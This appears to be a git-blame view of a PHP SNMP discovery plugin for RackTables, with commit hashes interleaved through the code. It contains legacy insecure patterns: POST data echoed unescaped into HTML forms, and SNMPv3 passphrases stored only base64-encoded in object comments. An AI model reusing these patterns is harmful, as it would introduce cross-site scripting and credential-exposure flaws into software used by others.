= $snmp->get($oid); 515 516 $replacement = '\\1'; 517 518 if(isset($attr['regex'])) { 519 $regex = $attr['regex']; 520 521 if(isset($attr['replacement'])) 522 $replacement = $attr['replacement']; 523 524 } else { 525 $list = array('bsd','linux','centos','suse','fedora','ubuntu','windows','solaris','vmware'); 526 527 $regex = '/.* ([^ ]*('.implode($list,'|').')[^ ]*) .*/i'; 528 $replacement = '\\1'; 529 } 530 531 $value = preg_replace($regex, $replacement, $raw_value, -1, $count); 532 //$attr['value'] = $value; 533 534 if(!empty($value) && $count > 0) { 535 /* search dict_key for value in RT Dictionary */ 536 /* depends on object type server(13)/switch(14)/router(15) */ 30bf198b 537 $result = usePreparedSelectBlade 538 ( 539 'SELECT dict_key,dict_value FROM Dictionary WHERE chapter_id in (13,14,15) and dict_value like ? order by dict_key desc limit 1', 540 array ('%'.$value.'%') 541 ); 542 $row = $result->fetchAll(PDO::FETCH_GROUP|PDO::FETCH_UNIQUE|PDO::FETCH_COLUMN); 9276dc97 ME 543 544 if(!empty($row)) { 545 $RTvalue = key($row); 546 547 if(isset($attr['comment'])) 548 $attr['comment'] .= ", $value ($RTvalue) ".$row[$RTvalue]; 549 else 550 $attr['comment'] = "$value ($RTvalue) ".$row[$RTvalue]; 551 552 showSuccess("Found SW type: $value ($RTvalue) ".$row[$RTvalue]); 553 $value = $RTvalue; 554 } 555 556 /* set attr value */ 557 $attr['value'] = $value; a2ce4850 558 $attr['key'] = $value; 9276dc97 ME 559 // unset($attr['uncheck']); 560 561 } 562 563 if(isset($attr['comment'])) 564 $attr['comment'] .= ' (experimental)'; 565 else 566 $attr['comment'] = '(experimental)'; 567 568} /* snmpgeneric_pf_swtype */ 569 570/* -------------------------------------------------- */ 30bf198b 571/* try to set SW version 9276dc97 ME 572 * and add some AC ports 573 * 574 */ 575/* needs more testing */ 576function snmpgeneric_pf_entitymib(&$snmp, &$sysObjectID, $attr_id) { 30bf198b 577 9276dc97 ME 578 /* $attr_id == NULL -> device pf */ 579 580 $attrs = &$sysObjectID['attr']; 581 $ports = &$sysObjectID['port']; 582 583 $entPhysicalClass = $snmp->walk('.1.3.6.1.2.1.47.1.1.1.1.5'); /* entPhysicalClass */ 584 585 if(empty($entPhysicalClass)) 586 return; 587 588 showNotice("Found Entity Table (Experimental)"); 589 30bf198b 590/* PhysicalClass 9276dc97 ME 591 * 1:other 592 * 2:unknown 593 * 3:chassis 594 * 4:backplane 595 * 5:container 596 * 6:powerSupply 597 * 7:fan 598 * 8:sensor 599 * 9:module 600 * 10:port 601 * 11:stack 602 * 12:cpu 603 */ 604 605 /* chassis */ 606 607 /* always index = 1 ??? */ 608 $chassis = array_keys($entPhysicalClass, '3'); /* 3 chassis */ 609 610 if(0) 611 if(!empty($chassis)) { 612 echo '<table>'; 613 614 foreach($chassis as $key => $oid) { 615 /* get index */ 30bf198b 616 if(!preg_match('/\.(\d+)$/',$oid, $matches)) 9276dc97 ME 617 continue; 618 30bf198b 619 $index = $matches[1]; 620 621 $name = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.7.$index"); 622 $serialnum = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.11.$index"); 623 $mfgname = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.12.$index"); 624 $modelname = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.13.$index"); 9276dc97 625 9276dc97 ME 626 //showNotice("$name $mfgname $modelname $serialnum"); 627 628 echo("<tr><td>$name</td><td>$mfgname</td><td>$modelname</td><td>$serialnum</td>"); 629 } 630 unset($key); 631 unset($oid); 632 633 echo '</table>'; 634 } /* chassis */ 635 636 637 638 /* modules */ 639 640 $modules = array_keys($entPhysicalClass, '9'); /* 9 Modules */ 641 642 if(!empty($modules)) { 643 644 echo '<br><br>Modules<br><table>'; 645 echo("<tr><th>Name</th><th>MfgName</th><th>ModelName</th><th>HardwareRev</th><th>FirmwareRev</th><th>SoftwareRev</th><th>SerialNum</th>"); 30bf198b 646 9276dc97 ME 647 foreach($modules as $key => $oid) { 648 649 /* get index */ 30bf198b 650 if(!preg_match('/\.(\d+)$/',$oid, $matches)) 9276dc97 ME 651 continue; 652 30bf198b 653 $index = $matches[1]; 654 655 $name = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.7.$index"); 5eb2e24f 656 657 if(!$name) 658 continue; 659 30bf198b 660 $hardwarerev = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.8.$index"); 661 $firmwarerev = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.9.$index"); 662 $softwarerev = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.10.$index"); 663 $serialnum = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.11.$index"); 664 $mfgname = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.12.$index"); 665 $modelname = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.13.$index"); 9276dc97 666 9276dc97 ME 667 //showNotice("$name $mfgname $modelname $hardwarerev $firmwarerev $softwarerev $serialnum"); 668 669 echo("<tr><td>".(empty($name) ? '-' : $name )."</td><td>$mfgname</td><td>$modelname</td><td>$hardwarerev</td><td>$firmwarerev</td><td>$softwarerev</td><td>$serialnum</td>"); 670 671 /* set SW version to first module software version */ 672 if($key == 0 ) { 673 674 $attrs[5]['value'] = $softwarerev; /* SW version */ 675 $attrs[5]['comment'] = 'entity MIB'; 676 } 677 678 } 679 unset($key); 680 unset($oid); 681 682 echo '</table>'; 683 } 684 685 686 /* add AC ports */ 687 $powersupply = array_keys($entPhysicalClass, '6'); /* 6 powerSupply */ 688 $count = 1; 689 foreach($powersupply as $oid) { 690 691 /* get index */ 30bf198b 692 if(!preg_match('/\.(\d+)$/',$oid, $matches)) 9276dc97 ME 693 continue; 694 30bf198b 695 $index = $matches[1]; 696 $descr = $snmp->get(".1.3.6.1.2.1.47.1.1.1.1.2.$index"); 9276dc97 697 30bf198b 698 $ports['AC-'.$count] = array('porttypeid' => '1-16', 'ifDescr' => $descr, 'comment' => 'entity MIB', 'uncheck' => ''); 9276dc97 ME 699 $count++; 700 } 701 unset($oid); 702} 703 704/* -------------------------------------------------- */ 705 706/* 707 * regex processor function 708 * needs 'oid' and 'regex' 709 * uses first back reference as attribute value 710 */ 711function snmpgeneric_pf_regex(&$snmp, &$sysObjectID, $attr_id) { 712 713 $attr = &$sysObjectID['attr'][$attr_id]; 714 715 if (isset($attr['oid']) && isset($attr['regex'])) { 716 717 $oid = $attr['oid']; 718 $regex = $attr['regex']; 719 720 $raw_value = $snmp->get($oid); 721 722 723 if(isset($attr['replacement'])) 724 $replace = $attr['replacement']; 725 else 726 $replace = '\\1'; 727 728 $value = preg_replace($regex,$replace, $raw_value); 30bf198b 729 9276dc97 ME 730 /* return array of attr_id => attr_value) */ 731 $attr['value'] = $value; 732 30bf198b 733 } 9276dc97 ME 734 // else Warning ?? 735 736} /* snmpgeneric_pf_regex */ 737 738/* -------------------------------------------------- */ 739 740$sg_portiifoptions= getPortIIFOptions(); 741$sg_portiifoptions[-1] = 'sfp'; /* generic sfp */ 742 5130f8be 743$sg_portoifoptions= getPortOIFOptions(); 9276dc97 ME 744 745/* -------------------------------------------------- */ 746/* -------------------------------------------------- */ 747 748function snmpgeneric_tabhandler($object_id) { 749 8188a17c 750// sg_var_dump_html($_POST); 751 752 if(isset($_POST['asnewobject']) && $_POST['asnewobject'] == "1") 753 { 754 $newobject_name = $_POST['object_name']; 755 $newobject_label = $_POST['object_label']; 756 $newobject_type_id = $_POST['object_type_id']; 757 $newobject_asset_no = $_POST['object_asset_no']; 758 759 if(sg_checkObjectNameUniqueness($newobject_name, $newobject_type_id)) 760 { 761 762 $object_id = commitAddObject($newobject_name, $newobject_label, $newobject_type_id, $newobject_asset_no); 763 764 $_POST['asnewobject'] = "0"; 765 766 parse_str($_SERVER['QUERY_STRING'],$query_string); 767 768 $query_string['object_id'] = $object_id; 769 770 $_SERVER['QUERY_STRING'] = http_build_query($query_string); 771 772 list($path, $qs) = explode('?',$_SERVER['REQUEST_URI'],2); 773 $_SERVER['REQUEST_URI'] = $path.'?'.$_SERVER['QUERY_STRING']; 774 775 776 // switch to new object 777 echo '<body>'; 778 echo '<body onload="document.forms[\'newobject\'].submit();">'; 779 780 echo '<form method=POST id=newobject action='.$_SERVER['REQUEST_URI'].'>'; 781 782 foreach($_POST as $name => $value) 783 { 784 echo "<input type=hidden name=$name value=$value>"; 785 } 786 787 echo '<input type=submit id="submitbutton" tabindex="1" value="Show List">'; 788 echo '</from></body>'; 789 exit; 30bf198b 790 } 8188a17c 791 else 792 { 793 showError("Object with name: \"$newobject_name\" already exists!!!"); 794 $_POST['snmpconfig'] = "0"; 795 } 796 } 797 365fb193 798 // save snmp settings 799 if(isset($_POST['save']) && $_POST['save'] == "1") 800 { 801 // TODO save only on success !! 802 803 $object = spotEntity('object', $object_id); 804 805 $snmpvalues[0] = 'SNMP'; 806 $snmpnames = array('host', 'version', 'community'); 2bfc8235 807 if($_POST['version'] == "v3") 365fb193 808 $snmpnames = array_merge($snmpnames, array('sec_level','auth_protocol','auth_passphrase','priv_protocol','priv_passphrase')); 809 810 foreach($snmpnames as $key => $value) 811 { 812 if(isset($_POST[$value])) 813 { 814 switch($value) 815 { 816 case "auth_passphrase": 817 case "priv_passphrase": 818 $snmpvalues[$key + 1] = base64_encode($_POST[$value]); 819 break; 820 821 default: $snmpvalues[$key + 1] = $_POST[$value]; 822 } 823 } 824 } 825 826 // sg_var_dump_html($snmpvalues); 827 828 $newsnmpstr = implode($snmpvalues,":"); 829 830 $snmpstr = strtok($object['comment'],"\n\r"); 831 832 $snmpstrarray = explode(':', $snmpstr); 833 834 $setcomment = "set"; 835 if($snmpstrarray[0] == "SNMP") 836 { 837 if($newsnmpstr == $snmpstr) 838 $setcomment = "ok"; 839 else 840 $setcomment = "update"; 841 } 842 843 if($setcomment != "ok") 844 { 845 846 if($setcomment == "update") 847 $comment = str_replace($snmpstr,$newsnmpstr, $object['comment']); 848 else 849 $comment = "$newsnmpstr\n".$object['comment']; 850 851 // echo "$snmpnewstr ".$object['comment']." --> $comment"; 852 853 commitUpdateObject($object_id, $object['name'], NULL, $object['has_problems'], NULL, $comment ); 854 showNotice("$setcomment SNMP Settings: $newsnmpstr"); 855 856 } 857 858 } 859 8188a17c 860 if(isset($_POST['snmpconfig']) && $_POST['snmpconfig'] == '1') { 861 snmpgeneric_list($object_id); 9276dc97 ME 862 } else { 863 snmpgeneric_snmpconfig($object_id); 864 } 865} /* snmpgeneric_tabhandler */ 866 867/* -------------------------------------------------- */ 868 00f9fc86 869function snmpgeneric_tabtrigger() { 870 // display tab only on IPv4 Objects 871 return considerConfiguredConstraint (spotEntity ('object', getBypassValue()), 'IPV4OBJ_LISTSRC') ? 'std' : ''; 872} /* snmpgeneric_tabtrigger */ 9276dc97 ME 873 874/* -------------------------------------------------- */ 875 876function snmpgeneric_snmpconfig($object_id) { 877 9276dc97 ME 878 879 $object = spotEntity ('object', $object_id); 880 //$object['attr'] = getAttrValues($object_id); 881 $endpoints = findAllEndpoints ($object_id, $object['name']); 882 883 addJS('function showsnmpv3(element) { 30bf198b 884 var style; 2bfc8235 885 if(element.value != \'v3\') { 9276dc97 ME 886 style = \'none\'; 887 document.getElementById(\'snmp_community_label\').style.display=\'\'; 888 } else { 889 style = \'\'; 890 document.getElementById(\'snmp_community_label\').style.display=\'none\'; 891 } 892 30bf198b 893 var elements = document.getElementsByName(\'snmpv3\'); 894 for(var i=0;i<elements.length;i++) { 9276dc97 ME 895 elements[i].style.display=style; 896 } 897 };',TRUE); 898 8188a17c 899 addJS('function shownewobject(element) { 900 var style; 901 902 if(element.checked) { 903 style = \'\'; 904 } else { 905 style = \'none\'; 906 } 907 908 var elements = document.getElementsByName(\'newobject\'); 909 for(var i=0;i<elements.length;i++) { 910 elements[i].style.display=style; 911 } 912 };',TRUE); 913 30bf198b 914 addJS('function checkInput() { 915 var host = document.getElementById(\'host\'); 916 917 if(host.value == "-1") { 918 var newvalue = prompt("Enter Hostname or IP Address",""); 919 if(newvalue != "") { 920 host.options[host.options.length] = new Option(newvalue, newvalue); 921 host.value = newvalue; 922 } 923 } 924 925 if(host.value != "-1" && host.value != "") 926 return true; 927 else 928 return false; 929 };',TRUE); 930 8188a17c 931 echo '<body onload="document.getElementById(\'submitbutton\').focus(); showsnmpv3(document.getElementById(\'snmpversion\')); shownewobject(document.getElementById(\'asnewobject\'));">'; 932 9276dc97 ME 933 foreach( $endpoints as $key => $value) { 934 $endpoints[$value] = $value; 935 unset($endpoints[$key]); 936 } 937 unset($key); 938 unset($value); 939 940 foreach( getObjectIPv4Allocations($object_id) as $ip => $value) { 941 30bf198b 942 $ip = ip_format($ip); 943 9276dc97 ME 944 if(!in_array($ip, $endpoints)) 945 $endpoints[$ip] = $ip; 946 } 947 unset($ip); 948 unset($value); 949 950 foreach( getObjectIPv6Allocations($object_id) as $value) { 30bf198b 951 $ip = ip_format(ip_parse($value['addrinfo']['ip'])); 9276dc97 ME 952 953 if(!in_array($ip, $endpoints)) 954 $endpoints[$ip] = $ip; 955 } 956 unset($value); 957 30bf198b 958 /* ask for ip/host name on submit see js checkInput() */ 959 $endpoints['-1'] = 'ask me'; 960 365fb193 961 // saved snmp settings 962 $snmpstr = strtok($object['comment'],"\n\r"); 963 $snmpstrarray = explode(':', $snmpstr); 964 965 if($snmpstrarray[0] == "SNMP") 966 { 2bfc8235 967 /* keep it compatible with older version */ 968 switch($snmpstrarray[2]) 969 { 970 case "1": 971 $snmpstrarray[2] = 'v1'; 972 break; 973 case "2": 974 case "v2C": 975 $snmpstrarray[2] = 'v2c'; 976 break; 977 case "3": 978 $snmpstrarray[2] = 'v3'; 979 break; 980 } 981 365fb193 982 $snmpnames = array('SNMP','host', 'version', 'community'); 2bfc8235 983 if($snmpstrarray[2] == "v3") 365fb193 984 $snmpnames = array_merge($snmpnames, array('sec_level','auth_protocol','auth_passphrase','priv_protocol','priv_passphrase')); 985 986 $snmpvalues = array(); 987 foreach($snmpnames as $key => $value) 988 { 989 if(isset($snmpstrarray[$key])) 990 { 991 switch($key) 992 { 993 case 6: 994 case 8: 995 $snmpvalues[$value] = base64_decode($snmpstrarray[$key]); 996 break; 997 998 default: $snmpvalues[$value] = $snmpstrarray[$key]; 999 } 1000 } 1001 } 1002 1003 unset($snmpvalues['SNMP']); 1004 1005 $snmpconfig = $snmpvalues; 1006 } 1007 else 1008 $snmpconfig = array(); 1009 1010 $snmpconfig += $_POST; 9276dc97 ME 1011 1012 if(!isset($snmpconfig['host'])) { 30bf198b 1013 $snmpconfig['host'] = -1; 9276dc97 ME 1014 1015 /* try to find first FQDN or IP */ 1016 foreach($endpoints as $value) { 1017 if(preg_match('/^[^ .]+(\.[^ .]+)+\.?/',$value)) { 1018 $snmpconfig['host'] = $value; 1019 break; 1020 } 1021 } 1022 unset($value); 1023 } 1024 30bf198b 1025// sg_var_dump_html($endpoints); 9276dc97 1026 8188a17c 1027 if(!isset($snmpconfig['version'])) 9276dc97 ME 1028 $snmpconfig['version'] = mySNMP::SNMP_VERSION; 1029 1030 if(!isset($snmpconfig['community'])) 1031 $snmpconfig['community'] = getConfigVar('DEFAULT_SNMP_COMMUNITY'); 1032 1033 if(empty($snmpconfig['community'])) 1034 $snmpconfig['community'] = mySNMP::SNMP_COMMUNITY; 1035 1036 if(!isset($snmpconfig['sec_level'])) 1037 $snmpconfig['sec_level'] = NULL; 1038 1039 if(!isset($snmpconfig['auth_protocol'])) 1040 $snmpconfig['auth_protocol'] = NULL; 1041 1042 if(!isset($snmpconfig['auth_passphrase'])) 1043 $snmpconfig['auth_passphrase'] = NULL; 1044 1045 if(!isset($snmpconfig['priv_protocol'])) 1046 $snmpconfig['priv_protocol'] = NULL; 1047 1048 if(!isset($snmpconfig['priv_passphrase'])) 1049 $snmpconfig['priv_passphrase'] = NULL; 1050 8188a17c 1051 if(!isset($snmpconfig['asnewobject'])) 1052 $snmpconfig['asnewobject'] = NULL; 1053 1054 if(!isset($snmpconfig['object_type_id'])) 1055 $snmpconfig['object_type_id'] = '8'; 1056 1057 if(!isset($snmpconfig['object_name'])) 1058 $snmpconfig['object_name'] = NULL; 1059 1060 if(!isset($snmpconfig['object_label'])) 1061 $snmpconfig['object_label'] = NULL; 1062 1063 if(!isset($snmpconfig['object_asset_no'])) 1064 $snmpconfig['object_asset_no'] = NULL; 1065 365fb193 1066 if(!isset($snmpconfig['save'])) 1067 $snmpconfig['save'] = true; 1068 8188a17c 1069// sg_var_dump_html($snmpconfig); 1070 1071// $snmpv3displaystyle = ($snmpconfig['version'] == "3" ? "style=\"\"" : "style=\"display:none;\""); 1072 9276dc97 1073 echo '<h1 align=center>SNMP Config</h1>'; 30bf198b 1074 echo '<form method=post name="snmpconfig" onsubmit="return checkInput()" action='.$_SERVER['REQUEST_URI'].' />'; 9276dc97 ME 1075 1076 echo '<table cellspacing=0 cellpadding=5 align=center class=widetable> 1077 <tr><th class=tdright>Host:</th><td>'; 30bf198b 1078 365fb193 1079 //if($snmpconfig['asnewobject'] == '1' ) 1080 if($snmpconfig['host'] != '-1' and !isset($endpoints[$snmpconfig['host']])) 8188a17c 1081 $endpoints[$snmpconfig['host']] = $snmpconfig['host']; 1082 30bf198b 1083 echo getSelect ($endpoints, array ('id' => 'host','name' => 'host'), $snmpconfig['host'], FALSE); 9276dc97 ME 1084 1085 echo'</td></tr> 30bf198b 1086 <tr> 9276dc97 ME 1087 <th class=tdright><label for=snmpversion>Version:</label></th> 1088 <td class=tdleft>'; 1089 2bfc8235 1090 echo getSelect (array("v1" => 'v1', "v2c" => 'v2c', "v3" => 'v3'), 9276dc97 ME 1091 array ('name' => 'version', 'id' => 'snmpversion', 'onchange' => 'showsnmpv3(this)'), 1092 $snmpconfig['version'], FALSE); 1093 1094 echo '</td> 1095 </tr> 1096 <tr> 1097 <th id="snmp_community_label" class=tdright><label for=community>Community:</label></th> 8188a17c 1098 <th name="snmpv3" style="display:none;" class=tdright><label for=community>Security Name:</label></th> 9276dc97 ME 1099 <td class=tdleft><input type=text name=community value='.$snmpconfig['community'].' ></td> 1100 </tr> 1101 <tr name="snmpv3" style="display:none;"> 1102 <th></th> 1103 </tr> 1104 <tr name="snmpv3" style="display:none;"> 1105 <th class=tdright><label">Security Level:</label></th> 1106 <td class=tdleft>'; 1107 1108 echo getSelect (array('noAuthNoPriv' => 'no Auth and no Priv', 'authNoPriv'=> 'auth without Priv', 'authPriv' => 'auth with Priv'), 1109 array ('name' => 'sec_level'), 1110 $snmpconfig['sec_level'], FALSE); 1111 1112 echo '</td></tr> 1113 <tr name="snmpv3" style="display:none;"> 1114 <th class=tdright><label>Auth Type:</label></th> 1115 <td class=tdleft> 1116 <input name=auth_protocol type=radio value=MD5 '.($snmpconfig['auth_protocol'] == 'MD5' ? ' checked="checked"' : '').'/><label>MD5</label> 1117 <input name=auth_protocol type=radio value=SHA '.($snmpconfig['auth_protocol'] == 'SHA' ? ' checked="checked"' : '').'/><label>SHA</label> 1118 </td> 1119 </tr> 1120 <tr name="snmpv3" style="display:none;"> 1121 <th class=tdright><label>Auth Key:</label></th> 1122 <td class=tdleft><input type=password id=auth_passphrase name=auth_passphrase value="'.$snmpconfig['auth_passphrase'].'"></td> 1123 </tr> 1124 <tr name="snmpv3" style="display:none;"> 1125 <th class=tdright><label>Priv Type:</label></th> 1126 <td class=tdleft> 1127 <input name=priv_protocol type=radio value=DES '.($snmpconfig['priv_protocol'] == 'DES' ? ' checked="checked"' : '').'/><label>DES</label> 1128 <input name=priv_protocol type=radio value=AES '.($snmpconfig['priv_protocol'] == 'AES' ? ' checked="checked"' : '').'/><label>AES</label> 1129 </td> 1130 </tr> 1131 <tr name="snmpv3" style="display:none;"> 1132 <th class=tdright><label>Priv Key</label></th> 1133 <td class=tdleft><input type=password name=priv_passphrase value="'.$snmpconfig['priv_passphrase'].'"></td> 1134 </tr> 1135 </tr> 8188a17c 1136 1137 <tr> 1138 <th></th> 1139 <td class=tdleft> 1140 <input name=asnewobject id=asnewobject type=checkbox value=1 onchange="shownewobject(this)"'.($snmpconfig['asnewobject'] == '1' ? ' checked="checked"' : '').'> 1141 <label>Create as new object</label></td> 1142 </tr>'; 1143 1144// $newobjectdisplaystyle = ($snmpconfig['asnewobject'] == '1' ? "" : "style=\"display:none;\""); 1145 1146 echo '<tr name="newobject" style="display:none;"> 1147 <th class=tdright>Type:</th><td class=tdleft>'; 1148 1149 $typelist = withoutLocationTypes (readChapter (CHAP_OBJTYPE, 'o')); 1150 $typelist = cookOptgroups ($typelist); 1151 1152 printNiftySelect ($typelist, array ('name' => "object_type_id"), $snmpconfig['object_type_id']); 1153 1154 echo '</td></tr> 1155 1156 <tr name="newobject" style="display:none;"> 1157 <th class=tdright>Common name:</th><td class=tdleft><input type=text name=object_name value='.$snmpconfig['object_name'].'></td></tr> 1158 <tr name="newobject" style="display:none;"> 1159 <th class=tdright>Visible label:</th><td class=tdleft><input type=text name=object_label value='.$snmpconfig['object_label'].'></td></tr> 1160 <tr name="newobject" style="display:none;"> 1161 <th class=tdright>Asset tag:</th><td class=tdleft><input type=text name=object_asset_no value='.$snmpconfig['object_asset_no'].'></td></tr> 1162 365fb193 1163 <tr> 1164 <th></th> 1165 <td class=tdleft> 1166 <input name=save id=save type=checkbox value=1'.($snmpconfig['save'] == '1' ? ' checked="checked"' : '').'> 1167 <label>Save SNMP settings for object</label></td> 1168 </tr> 9276dc97 ME 1169 <td colspan=2> 1170 1171 <input type=hidden name=snmpconfig value=1> 1172 <input type=submit id="submitbutton" tabindex="1" value="Show List"></td></tr> 1173 1174 </table></form>'; 1175 1176} /* snmpgeneric_snmpconfig */ 1177 1178function snmpgeneric_list($object_id) { 1179 30bf198b 1180 global $sg_create_noconnector_ports, $sg_known_sysObjectIDs, $sg_portoifoptions, $sg_ifType_ignore; 9276dc97 ME 1181 1182 if(isset($_POST['snmpconfig'])) { 30bf198b 1183 $snmpconfig = $_POST; 9276dc97 ME 1184 } else { 1185 showError("Missing SNMP Config"); 1186 return; 1187 } 1188 8188a17c 1189// sg_var_dump_html($snmpconfig); 1190 9276dc97 ME 1191 echo '<body onload="document.getElementById(\'createbutton\').focus();">'; 1192 1193 addJS('function setchecked(classname) { var boxes = document.getElementsByClassName(classname); 30bf198b 1194 var value = document.getElementById(classname).checked; 9276dc97 ME 1195 for(i=0;i<boxes.length;i++) { 1196 if(boxes[i].disabled == false) 1197 boxes[i].checked=value; 1198 } 1199 };', TRUE); 1200 1201 $object = spotEntity ('object', $object_id); 1202 1203 $object['attr'] = getAttrValues($object_id); 1204 1205 $snmpdev = new mySNMP($snmpconfig['version'], $snmpconfig['host'], $snmpconfig['community']); 1206 2bfc8235 1207 if($snmpconfig['version'] == "v3" ) { 9276dc97 ME 1208 $snmpdev->setSecurity( $snmpconfig['sec_level'], 1209 $snmpconfig['auth_protocol'], 1210 $snmpconfig['auth_passphrase'], 1211 $snmpconfig['priv_protocol'], 1212 $snmpconfig['priv_passphrase'] 1213 ); 1214 } 1215 1216 $snmpdev->init(); 1217 1218 if($snmpdev->getErrno()) { 1219 showError($snmpdev->getError()); 1220 return; 1221 } 1222 1223 /* SNMP connect successfull */ 1224 2bfc8235 1225 showSuccess("SNMP ".$snmpconfig['version']." connect to ${snmpconfig['host']} successfull"); 9276dc97 ME 1226 1227 echo '<form name=CreatePorts method=post action='.$_SERVER['REQUEST_URI'].'&module=redirect&op=create>'; 1228 1229 echo "<strong>System Informations</strong>"; 1230 echo "<table>"; 1231// echo "<tr><th>OID</th><th>Value</th></tr>"; 1232 1233 $systemoids = array('sysDescr', 'sysObjectID', 'sysUpTime', 'sysContact', 'sysName', 'sysLocation'); 1234 foreach ($systemoids as $shortoid) { 1235 1236 $value = $snmpdev->{$shortoid}; 1237 1238 if($shortoid == 'sysUpTime') { 1239 /* in hundredths of a second */ 1240 $secs = (int)($value / 100); 1241 $days = (int)($secs / (60 * 60 * 24)); 1242 $secs -= $days * 60 *60 * 24; 1243 $hours = (int)($secs / (60 * 60)); 1244 $secs -= $hours * 60 * 60; 1245 $mins = (int)($secs / (60)); 1246 $secs -= $mins * 60; 1247 $value = "$value ($days $hours:$mins:$secs)"; 1248 } 1249 1250 echo "<tr><td title=\"".$snmpdev->lastgetoid."\" align=\"right\">$shortoid: </td><td>$value</td></tr>"; 1251 1252 } 1253 unset($shortoid); 1254 1255 echo "</table>"; 1256 1257 /* sysObjectID Attributes and Ports */ 1258 $sysObjectID['object'] = &$object; 1259 1260 /* get sysObjectID */ 1261 $sysObjectID['raw_value'] = $snmpdev->sysObjectID; 1262 //$sysObjectID['raw_value'] = 'NET-SNMP-MIB::netSnmpAgentOIDs.10'; 1263 1264 $sysObjectID['value'] = preg_replace('/^.*enterprises\.([\.[:digit:]]+)$/','\\1', $sysObjectID['raw_value']); 1265 1266 /* try snmptranslate to numeric */ 1267 if(preg_match('/[^\.0-9]+/',$sysObjectID['value'])) { 1268 $numeric_value = $snmpdev->translatetonumeric($sysObjectID['value']); 1269 1270 if(!empty($numeric_value)) { 1271 showSuccess("sysObjectID: ".$sysObjectID['value']." translated to $numeric_value"); 1272 $sysObjectID['value'] = preg_replace('/^.1.3.6.1.4.1.([\.[:digit:]]+)$/','\\1', $numeric_value); 1273 } 1274 } 1275 1276 /* array_merge doesn't work with numeric keys !! */ 1277 $sysObjectID['attr'] = array(); 1278 $sysObjectID['port'] = array(); 30bf198b 1279 9276dc97 ME 1280 $sysobjid = $sysObjectID['value']; 1281 1282 $count = 1; 1283 1284 while($count) { 1285 1286 if(isset($sg_known_sysObjectIDs[$sysobjid])) { 1287 $sysObjectID = $sysObjectID + $sg_known_sysObjectIDs[$sysobjid]; 30bf198b 1288 9276dc97 ME 1289 if(isset($sg_known_sysObjectIDs[$sysobjid]['attr'])) 1290 $sysObjectID['attr'] = $sysObjectID['attr'] + $sg_known_sysObjectIDs[$sysobjid]['attr']; 30bf198b 1291 9276dc97 ME 1292 if(isset($sg_known_sysObjectIDs[$sysobjid]['port'])) 1293 $sysObjectID['port'] = $sysObjectID['port'] + $sg_known_sysObjectIDs[$sysobjid]['port']; 30bf198b 1294 9276dc97 ME 1295 if(isset($sg_known_sysObjectIDs[$sysobjid]['text'])) { 1296 showSuccess("found sysObjectID ($sysobjid) ".$sg_known_sysObjectIDs[$sysobjid]['text']); 1297 } 1298 } 1299 1300 $sysobjid = preg_replace('/\.[[:digit:]]+$/','',$sysobjid, 1, $count); 30bf198b 1301 9276dc97 ME 1302 /* add default sysobjectid */ 1303 if($count == 0 && $sysobjid != 'default') { 1304 $sysobjid = 'default'; 1305 $count = 1; 1306 } 1307 } 1308 1309 $sysObjectID['vendor_number'] = $sysobjid; 1310 1311 /* device pf */ 1312 if(isset($sysObjectID['pf'])) 1313 foreach($sysObjectID['pf'] as $function) { 1314 if(function_exists($function)) { 1315 /* call device pf */ 1316 $function($snmpdev, $sysObjectID, NULL); 1317 } else { 1318 showWarning("Missing processor function ".$function." for device $sysobjid"); 1319 } 1320 } 1321 1322 1323 /* sort attributes maintain numeric keys */ 1324 ksort($sysObjectID['attr']); 1325 1326 /* DEBUG */ 1327 //sg_var_dump_html($sysObjectID['attr'], "Before processing"); 1328 1329 /* needs PHP >= 5 foreach call by reference */ 1330 /* php 5.1.6 doesn't seem to work */ ccf830c6 1331 //foreach($sysObjectID['attr'] as $attr_id => &$attr) 9276dc97 ME 1332 foreach($sysObjectID['attr'] as $attr_id => $value) { 1333 1334 $attr = &$sysObjectID['attr'][$attr_id]; 1335 1336 if(isset($object['attr'][$attr_id])) { 1337 56434951 1338 if(array_key_exists('key',$object['attr'][$attr_id])) 1339 $attr['key'] = $object['attr'][$attr_id]['key']; 1340 9276dc97 ME 1341 switch(TRUE) { 1342 1343 case isset($attr['pf']): 1344 if(function_exists($attr['pf'])) { 1345 1346 $attr['pf']($snmpdev, $sysObjectID, $attr_id); 1347 1348 } else { 1349 showWarning("Missing processor function ".$attr['pf']." for attribute $attr_id"); 1350 } 1351 1352 break; 1353 1354 case isset($attr['oid']): 1355 1356 $attrvalue = $snmpdev->get($attr['oid']); 1357 1358 if(isset($attr['regex'])) { 1359 $regex = $attr['regex']; 1360 1361 if(isset($attr['replacement'])) { 1362 $replacement = $attr['replacement']; 1363 $attrvalue = preg_replace($regex, $replacement, $attrvalue); 1364 } else { 1365 if(!preg_match($regex, $attrvalue)) { 1366 if(!isset($attr['uncheck'])) 1367 $attr['uncheck'] = "regex doesn't match"; 30bf198b 1368 } else 9276dc97 ME 1369 unset($attr['uncheck']); 1370 } 1371 } 1372 30bf198b 1373 $attr['value'] = $attrvalue; 9276dc97 ME 1374 1375 break; 1376 1377 case isset($attr['value']): 1378 break; 1379 1380 default: 1381 showError("Error handling attribute id: $attr_id"); 1382 1383 } 1384 1385 } else { 1386 showWarning("Object has no attribute id: $attr_id"); 1387 unset($sysObjectID['attr'][$attr_id]); 1388 } 1389 1390 } 1391 unset($attr_id); 1392 1393 /* sort again in case there where attribs added ,maintain numeric keys */ 1394 ksort($sysObjectID['attr']); 1395 1396 /* print attributes */ 1397 echo '<br>Attributes<br><table>'; 1398 echo '<tr><th><input type="checkbox" id="attribute" checked="checked" onclick="setchecked(this.id)"></td>'; 1399 echo '<th>Name</th><th>Current Value</th><th>new value</th></tr>'; 1400 1401 /* DEBUG */ 1402 //sg_var_dump_html($sysObjectID['attr'], "After processing"); 1403 30bf198b 1404 foreach($sysObjectID['attr'] as $attr_id => &$attr) { 9276dc97 1405 a2ce4850 1406 $attr['id'] = $attr_id; 1407 9276dc97 ME 1408 if(isset($object['attr'][$attr_id]) && isset($attr['value'])) { 1409 1410 if($attr['value'] == 